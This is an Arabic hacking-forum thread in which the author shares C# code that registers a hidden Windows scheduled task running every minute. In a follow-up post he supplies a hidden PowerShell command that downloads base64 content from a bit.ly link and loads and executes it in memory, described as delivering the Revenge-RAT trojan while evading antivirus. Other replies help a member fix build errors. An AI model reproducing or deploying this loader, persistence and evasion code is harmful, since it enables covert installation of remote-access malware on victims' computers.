(Launching Powershell attack using Task Scheduler C# (Revenge-rat Encryption

تم تحميل الصفحة في 1,7481153 ثانية
(Launching Powershell attack using Task Scheduler C# (Revenge-rat Encryption
إنضم
7 يوليو 2016
المشاركات
255
الإعجابات
359
النقاط
63
الإقامة
JEDDAH City
سلام عليكم ورحمة الله وبركاته


في هذا الموضوع راح نستخدم المهام المجدوله للأختراق بواسطة البور شل.

البور شل كثير من مكافحات الفايروسات تقف عاجزه امامه, طبعا بعد ما تتأكد ان البور شل اتاك تبعك نظيف.

ب معنى ما تستخدم دوال يتحسس منها الحمايات ك downloadstring مثلا.

عشان تفهم تفاصيل الاتاك المستخدم في الفيديو راجع موضوعي السابق

هنا

الاتاك عباره عن نقطة ادخال بور شل يتم من خلالها حقن وتشغيل بايتات الرفنج رات في الذاكره.

أترككم الان مع الفيديو ونتيجة الفحص

scan result

 
إنضم
7 يوليو 2016
المشاركات
255
الإعجابات
359
النقاط
63
الإقامة
JEDDAH City
C#:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using Microsoft.Win32.TaskScheduler;


namespace WindowsFormsApplication21
{
    static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main()
        {
            using (TaskService ts = new TaskService())
            {
                TaskDefinition td = ts.NewTask();

                td.RegistrationInfo.Description = "Powershell attack";  // give a description to the task you are adding.
                td.Settings.Enabled = true;

                //td.Settings.RunOnlyIfLoggedOn = false; 
                td.Settings.Hidden = true;
                td.Settings.StopIfGoingOnBatteries = false;              // this is to allow the execution of the task if either the machine on AC Power or battery
                td.Settings.DisallowStartIfOnBatteries = false;          // this is to allow the execution of the task if either the machine on AC Power or battery
                td.Settings.DisallowStartOnRemoteAppSession = false;
                TimeTrigger Time = new TimeTrigger();
                Time.StartBoundary = DateTime.Now;                        // start time is now
                Time.Repetition.Interval = TimeSpan.FromMinutes(Convert.ToInt16(1));   // repetition of the task every 1 minut.
                td.Triggers.Add(Time);

                td.Actions.Add(new ExecAction(@"", @"", null)); // directory of your program + the argument
                ts.RootFolder.RegisterTaskDefinition("Dev-point", td); // give a name to your Task

            }
        }
    }
}
 
إنضم
9 أكتوبر 2016
المشاركات
91
الإعجابات
58
النقاط
18
العمر
20
الإقامة
**********
C#:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using Microsoft.Win32.TaskScheduler;


namespace WindowsFormsApplication21
{
    static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main()
        {
            using (TaskService ts = new TaskService())
            {
                TaskDefinition td = ts.NewTask();

                td.RegistrationInfo.Description = "Powershell attack";  // give a description to the task you are adding.
                td.Settings.Enabled = true;

                //td.Settings.RunOnlyIfLoggedOn = false;
                td.Settings.Hidden = true;
                td.Settings.StopIfGoingOnBatteries = false;              // this is to allow the execution of the task if either the machine on AC Power or battery
                td.Settings.DisallowStartIfOnBatteries = false;          // this is to allow the execution of the task if either the machine on AC Power or battery
                td.Settings.DisallowStartOnRemoteAppSession = false;
                TimeTrigger Time = new TimeTrigger();
                Time.StartBoundary = DateTime.Now;                        // start time is now
                Time.Repetition.Interval = TimeSpan.FromMinutes(Convert.ToInt16(1));   // repetition of the task every 1 minut.
                td.Triggers.Add(Time);

                td.Actions.Add(new ExecAction(@"", @"", null)); // directory of your program + the argument
                ts.RootFolder.RegisterTaskDefinition("Dev-point", td); // give a name to your Task

            }
        }
    }
}
لاهنت الكود اللي اضفته وش من النوت باد
 
إنضم
7 يوليو 2016
المشاركات
255
الإعجابات
359
النقاط
63
الإقامة
JEDDAH City
انت عند النقطه ذي نسخة كود من مفكرة
(@"", @"", null
حبيبي النص الاول تضع فيه مسار الملف المراد تشغيله, في حالتي انا وضعت البور شل

اما النص الثاني ضع به الاوامر او البور شل اتاك تبعك.

ان شاء الله واضحه ؟
 
إنضم
7 يوليو 2016
المشاركات
255
الإعجابات
359
النقاط
63
الإقامة
JEDDAH City
انت عند النقطه ذي نسخة كود من مفكرة
(@"", @"", null

كود:
  td.Actions.Add(new ExecAction(@"Powershell.exe", @"-Windowstyle hidden -noexit [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String(((curl 'https://bit.ly/2SeoHct').Rawcontent-replace'\s').Remove(0,204))).EntryPoint.invoke($null,$null)", null)); // directory of your program + the argument
 
إنضم
9 أكتوبر 2016
المشاركات
91
الإعجابات
58
النقاط
18
العمر
20
الإقامة
**********
حبيبي النص الاول تضع فيه مسار الملف المراد تشغيله, في حالتي انا وضعت البور شل

اما النص الثاني ضع به الاوامر او البور شل اتاك تبعك.

ان شاء الله واضحه ؟
تمام ربي يعطيك العافيه
 
إنضم
7 يوليو 2016
المشاركات
255
الإعجابات
359
النقاط
63
الإقامة
JEDDAH City
جزاكـ الله كـل خير اخوي اذا ماعليك امر انا لما اسوي بيلد تجيني هاذي المشكلة الخطأ وين
المشكله بمكتبة Custra.Fody

احذفها واعد تحميلها تأكد ان النسخه المحمله نفس اللي حملتها بالفيديو

النسخه الاحدث من هذه المكتبه واجهتني معها مشاكل.
 
إنضم
30 أغسطس 2010
المشاركات
430
الإعجابات
333
النقاط
63
المشكله بمكتبة Custra.Fody

احذفها واعد تحميلها تأكد ان النسخه المحمله نفس اللي حملتها بالفيديو

النسخه الاحدث من هذه المكتبه واجهتني معها مشاكل.
حذفتها وحاولت وبرضو حذفت المشروع وسويت مشروع جديد وهذي النتيجة طبعاً كلها نفس النسخة اللي انت حملتها بالضبط
 
إنضم
7 يوليو 2016
المشاركات
255
الإعجابات
359
النقاط
63
الإقامة
JEDDAH City
حذفتها وحاولت وبرضو حذفت المشروع وسويت مشروع جديد وهذي النتيجة طبعاً كلها نفس النسخة اللي انت حملتها بالضبط
طيب ممكن تصور الكود.

ومسوي له بلد على اي اصدار فريم ورك ؟ على ما يبدو 4.
خليه اقل شي 4.5.2
 
إنضم
7 يوليو 2016
المشاركات
255
الإعجابات
359
النقاط
63
الإقامة
JEDDAH City

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل